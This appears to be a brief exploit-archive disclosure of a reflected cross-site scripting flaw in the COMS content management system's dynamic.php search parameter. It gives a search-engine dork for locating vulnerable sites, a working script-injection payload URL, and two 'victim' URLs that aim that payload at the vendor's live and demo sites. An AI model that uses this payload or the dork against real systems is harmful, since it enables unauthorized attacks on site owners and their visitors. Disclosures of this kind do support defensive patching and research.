COMS, or Contents and Object Management System, suffers from a cross site scripting vulnerability.
691e899c19b10b1fb46404e841ec9c490ee703080377fca0dbbc208be0f8351e
#########################################################
---------------------------------------------------------
Portal Name: COMS ( Contents & Object Management System )
Vendor : https://Coms.ir <https://coms.ir/>
Vulnerable File : dynamic.php
Dork: Copyright (C) 2005-2007 by COMS
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : XSS (Cross site scripting)
---------------------------------------------------------
#########################################################
https://site.ir/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new
---------------------------------
Victem :
https://coms.ir/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new
https://demo.coms.ir/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new